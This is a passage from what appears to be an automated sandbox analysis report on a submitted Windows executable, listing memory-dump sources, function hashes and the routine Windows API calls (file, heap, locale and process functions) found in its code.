                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Info
                                        • String ID:
                                        • API String ID: 1807457897-3916222277
                                        • Opcode ID: 3925c6dd1122441a5126d6ef4b48b99709bf93f63c7e9a2e3f0792777dc1031b
                                        • Instruction ID: 2c6e8450962c6706f03449f96e5b770d61d459afa3fe803cbda81854d4d50479
                                        • Opcode Fuzzy Hash: 3925c6dd1122441a5126d6ef4b48b99709bf93f63c7e9a2e3f0792777dc1031b
                                        • Instruction Fuzzy Hash: 8B41D87090438CDADF218E648C94FFAFBE9DB55304F1404EEE59A87242E739AA45DB60
                                        APIs
                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00BDAFDD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: String
                                        • String ID: LCMapStringEx
                                        • API String ID: 2568140703-3893581201
                                        • Opcode ID: 925839c9a303f17c866f2661730d257dccecb29de17d109ab68e7e4ad9b92813
                                        • Instruction ID: 3146de3aa3d5f8f481dd47ee2fc5f745333db06d62e8ba1ec3b445d6446e73a8
                                        • Opcode Fuzzy Hash: 925839c9a303f17c866f2661730d257dccecb29de17d109ab68e7e4ad9b92813
                                        • Instruction Fuzzy Hash: 09014832544249BBCF029F91DC06DEEBFA2EF08750F054195FE1466271DB368A31EB81
                                        APIs
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00BDA56F), ref: 00BDAF55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: CountCriticalInitializeSectionSpin
                                        • String ID: InitializeCriticalSectionEx
                                        • API String ID: 2593887523-3084827643
                                        • Opcode ID: 2e0667479c2e16551fad34eb3113cb6a2c5dba894cd7ec2fd7e46c46429b83f4
                                        • Instruction ID: 2ad724adb3364065eb49c98c4537ee8981c1ecd92330383d41b3c5184e50a8f6
                                        • Opcode Fuzzy Hash: 2e0667479c2e16551fad34eb3113cb6a2c5dba894cd7ec2fd7e46c46429b83f4
                                        • Instruction Fuzzy Hash: F9F0B435685248BBCB115F51DC46DADBFE1EF04B11B0041D9FD189B260EF715E109B86
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Alloc
                                        • String ID: FlsAlloc
                                        • API String ID: 2773662609-671089009
                                        • Opcode ID: 806327c86c8007dcb0ec96c0b72587533e49221bec1ce23ff37d50f557044354
                                        • Instruction ID: 12215e1298c4a3894325e55c7e06527874f9aee35c59e9cc03438193ae3b35d0
                                        • Opcode Fuzzy Hash: 806327c86c8007dcb0ec96c0b72587533e49221bec1ce23ff37d50f557044354
                                        • Instruction Fuzzy Hash: 3CE055306812487BC300AB26DC46D3EBBD1CF04B21B0001EAFC04AB350EE305E0086C6
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCEAF9
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: 3Ro
                                        • API String ID: 1269201914-1492261280
                                        • Opcode ID: 964d8a1ca18432ebfdf56df2423d77b5805be8682f29e5ba3e91012906b2a05b
                                        • Instruction ID: b2975e1dfff7d63b84efa358328c63db56269d72b0f781cbcde7157f9b06409b
                                        • Opcode Fuzzy Hash: 964d8a1ca18432ebfdf56df2423d77b5805be8682f29e5ba3e91012906b2a05b
                                        • Instruction Fuzzy Hash: F1B012CB29B0C2FC350462011D82D3701CCC0C1B90330C0AEF420DC092EC808C421431
                                        APIs
                                          • Part of subcall function 00BDB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BDBA44,?), ref: 00BDB7E6
                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BDBA89,?,00000000), ref: 00BDBC64
                                        • GetCPInfo.KERNEL32(00000000,00BDBA89,?,?,?,00BDBA89,?,00000000), ref: 00BDBC77
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: CodeInfoPageValid
                                        • String ID:
                                        • API String ID: 546120528-0
                                        • Opcode ID: 7244127b8ee05308b58e9becfdfe8ca58d319a2274e9c6dabbcc8e47949ed94f
                                        • Instruction ID: fb11d868983da87c0a093047ee6d3bc3ee100a0ad196f3ab2a5515df126c1946
                                        • Opcode Fuzzy Hash: 7244127b8ee05308b58e9becfdfe8ca58d319a2274e9c6dabbcc8e47949ed94f
                                        • Instruction Fuzzy Hash: 4651DF74A00245DEDB249F75C881EBAFBE6EF41300F2A44FFD4968B352EB3599458B90
                                        APIs
                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00BB9A50,?,?,00000000,?,?,00BB8CBC,?), ref: 00BB9BAB
                                        • GetLastError.KERNEL32(?,00000000,00BB8411,-00009570,00000000,000007F3), ref: 00BB9BB6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: 5f5159c83fe716ce586ecbfec497b229d5a1617ff06154deb16455369d1b677d
                                        • Instruction ID: a039710c3b1fe4ea1524616bf89657372901bb47b5e213803c8b3cb0bccc378b
                                        • Opcode Fuzzy Hash: 5f5159c83fe716ce586ecbfec497b229d5a1617ff06154deb16455369d1b677d
                                        • Instruction Fuzzy Hash: 3141CC316043418FDB34DF25E5849BAB7E6FFD8720F148AADEA9183260D7F0ED448A91
                                        APIs
                                          • Part of subcall function 00BD97E5: GetLastError.KERNEL32(?,00BF1030,00BD4674,00BF1030,?,?,00BD3F73,00000050,?,00BF1030,00000200), ref: 00BD97E9
                                          • Part of subcall function 00BD97E5: _free.LIBCMT ref: 00BD981C
                                          • Part of subcall function 00BD97E5: SetLastError.KERNEL32(00000000,?,00BF1030,00000200), ref: 00BD985D
                                          • Part of subcall function 00BD97E5: _abort.LIBCMT ref: 00BD9863
                                          • Part of subcall function 00BDBB4E: _abort.LIBCMT ref: 00BDBB80
                                          • Part of subcall function 00BDBB4E: _free.LIBCMT ref: 00BDBBB4
                                          • Part of subcall function 00BDB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BDBA44,?), ref: 00BDB7E6
                                        • _free.LIBCMT ref: 00BDBA9F
                                        • _free.LIBCMT ref: 00BDBAD5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _free$ErrorLast_abort
                                        • String ID:
                                        • API String ID: 2991157371-0
                                        • Opcode ID: 144d7f3f13cc36417e0ef9d6a1c743f433bb43e3f907a8daeed2bb0f4ca18549
                                        • Instruction ID: 0b7034c6284909fa7dc424582d13adf80dc271aaeaa19cb2941e206fe01b6e63
                                        • Opcode Fuzzy Hash: 144d7f3f13cc36417e0ef9d6a1c743f433bb43e3f907a8daeed2bb0f4ca18549
                                        • Instruction Fuzzy Hash: F9316F31904209EFDB109BA8D441EA9F7E5EF44320F6640DBE4149B3A2FF329D40DB50
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BB1E55
                                          • Part of subcall function 00BB3BBA: __EH_prolog.LIBCMT ref: 00BB3BBF
                                        • _wcslen.LIBCMT ref: 00BB1EFD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog$_wcslen
                                        • String ID:
                                        • API String ID: 2838827086-0
                                        • Opcode ID: 95fec497717c30f18edf5e4524e37d1ad3f817705291e9ee74f7983494192c46
                                        • Instruction ID: e97677ebed99cf7106e705e1212ec0ab8407aa34b951455e5c104cb27f6e1de5
                                        • Opcode Fuzzy Hash: 95fec497717c30f18edf5e4524e37d1ad3f817705291e9ee74f7983494192c46
                                        • Instruction Fuzzy Hash: 703138719042099FCF11DF98C955AEEBBF5EF18300F5008AAE445B7252CB769E10CB60
                                        APIs
                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BB73BC,?,?,?,00000000), ref: 00BB9DBC
                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00BB9E70
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: File$BuffersFlushTime
                                        • String ID:
                                        • API String ID: 1392018926-0
                                        • Opcode ID: 5a03da814672f1128c68af5f5bfb46371a0b57839ab25ed721bcab07c9cfa20d
                                        • Instruction ID: 6b0c007600d8afde9514b667209aaaa091a4eb9cbc03a81b7561c1c8d109fd39
                                        • Opcode Fuzzy Hash: 5a03da814672f1128c68af5f5bfb46371a0b57839ab25ed721bcab07c9cfa20d
                                        • Instruction Fuzzy Hash: ED21CE31248285AFD714CF39C891ABABBE4EF95704F0849ADF5C587141D3A9E90C9B61
                                        APIs
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00BB9F27,?,?,00BB771A), ref: 00BB96E6
                                        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00BB9F27,?,?,00BB771A), ref: 00BB9716
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 4eebac0aa4f90501f8e8abd392c2ca4697bdf837f0cef10c0e543fc221f86d8a
                                        • Instruction ID: 7502b351d63c78030d8b55fab070b6e2dbb493f4daca4475af65d24a97531ee5
                                        • Opcode Fuzzy Hash: 4eebac0aa4f90501f8e8abd392c2ca4697bdf837f0cef10c0e543fc221f86d8a
                                        • Instruction Fuzzy Hash: 6B21CF71100344AFE3308A65CC89FF7B7DCEB49324F100A59FA96C61D2C7B4A8849A71
                                        APIs
                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00BB9EC7
                                        • GetLastError.KERNEL32 ref: 00BB9ED4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: 5df547f7e610faa4f08cd3cd61e8e8845dd75aaf8a323b4c21eb0cb72c6edf94
                                        • Instruction ID: 63b541c06240503da0e092056d6832f52a89627d5727c408442b30c89aca23ec
                                        • Opcode Fuzzy Hash: 5df547f7e610faa4f08cd3cd61e8e8845dd75aaf8a323b4c21eb0cb72c6edf94
                                        • Instruction Fuzzy Hash: 28118231600604EBE724CA29C885BF6B7E9EB45370F504AA9E652D3AD0DBF4ED49C660
                                        APIs
                                        • _free.LIBCMT ref: 00BD8E75
                                          • Part of subcall function 00BD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BDCA2C,00000000,?,00BD6CBE,?,00000008,?,00BD91E0,?,?,?), ref: 00BD8E38
                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00BF1098,00BB17CE,?,?,00000007,?,?,?,00BB13D6,?,00000000), ref: 00BD8EB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Heap$AllocAllocate_free
                                        • String ID:
                                        • API String ID: 2447670028-0
                                        • Opcode ID: 3cf2ea2dbaa51d950caa605ee570b15dff2a0716b2f8987a530dcaa668f4d826
                                        • Instruction ID: a5b2263d205bdd1bcc0c6c151d89a87981740e99d5288fff2e67e1b97eab9f49
                                        • Opcode Fuzzy Hash: 3cf2ea2dbaa51d950caa605ee570b15dff2a0716b2f8987a530dcaa668f4d826
                                        • Instruction Fuzzy Hash: E9F0C232601111B7CB257B25AC05BAFF7E8CFC1B72B2441ABF814AA391FF708D0189A0
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?), ref: 00BC10AB
                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 00BC10B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Process$AffinityCurrentMask
                                        • String ID:
                                        • API String ID: 1231390398-0
                                        • Opcode ID: 5163ad4a0ac56053425d16eede30781550c4d1edf8e73d18780a3929060569fb
                                        • Instruction ID: 57ba79a46ac7f1a64e4e012f3c68c931f5f706f310cf87384d179b6370c820ec
                                        • Opcode Fuzzy Hash: 5163ad4a0ac56053425d16eede30781550c4d1edf8e73d18780a3929060569fb
                                        • Instruction Fuzzy Hash: C8E0D832B00185A7CF098BB89C19EEB73DDEA4524431485FEE403F7203F934DE414A60
                                        APIs
                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BBA325,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA501
                                          • Part of subcall function 00BBBB03: _wcslen.LIBCMT ref: 00BBBB27
                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BBA325,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA532
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AttributesFile$_wcslen
                                        • String ID:
                                        • API String ID: 2673547680-0
                                        • Opcode ID: eec59d21928926426082ddfb9f9f0c7b056be0b27087b766f635dc642d4541a8
                                        • Instruction ID: 52f0b68fc79be46e6c9268e37f526a0c7c64d0c0dffbc918c4fda9b9152fd2cb
